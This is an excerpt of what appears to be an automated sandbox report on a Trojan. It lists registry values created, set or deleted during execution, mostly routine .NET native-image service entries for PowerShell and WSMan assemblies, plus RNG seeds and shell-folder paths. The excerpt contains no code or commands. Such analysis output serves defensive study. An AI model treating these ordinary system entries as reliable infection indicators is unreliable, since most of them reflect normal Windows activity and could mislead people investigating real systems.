[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EC 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 E6 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 0A 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\ListenedState]
"RootstoreDirty" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots]
"WorkPending" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 02 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F2 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 08 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F8 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "0"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 F0 00 00 00 53 00 79"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 41 2C 9E CA 2C 20 2F 34 18 BF 8D 8C EF 06 83"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 1C 01 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"
"ImageList" = "01 00 00 00 00 02 00 00 00 FC 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"ImageList" = "01 00 00 00 00 02 00 00 00 EE 00 00 00 4D 00 69"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"Status" = "3"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeVersion" = "v2.0.50727"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Status" = "5"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil\0]
"RuntimeMissing" = "1"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Runtime,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\System.Management.Automation,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GraphicalHost,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Utility.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Security.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Editor,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.GPowerShell,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Diagnostics,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.ConsoleHost.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.WSMan.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.BackgroundIntelligentTransfer.Management,Version=1.0.0.0,Culture=neutral,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\Roots\Microsoft.PowerShell.Commands.Management.resources,Version=1.0.0.0,Culture=en,PublicKeyToken=31bf3856ad364e35,ProcessorArchitecture=msil]
"Priority"

The process mscorsvw.exe:3248 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B 4C DE 62 58 5E 05 D8 58 A2 9D 37 71 F1 F9 F7"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

The process mscorsvw.exe:2316 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C3 B9 13 68 C9 BE 00 32 A3 FA B9 19 FE D0 FD 82"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The process mscorsvw.exe:3372 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\109ad3ab\680c6dce\64\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"SIG" = "B7 6F 43 3B 5E 11 DE 4E B3 DF 75 E5 9F 64 67 8F"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\67e63d5c\6\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF FD"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\77ccecdd\61ffc130\a\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\31cfc12a\67e55a12\63]
"Status" = "4098"

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\182177d0\3319830e]
"5a" = ""

[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\182177d0\3319830e\5a]
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
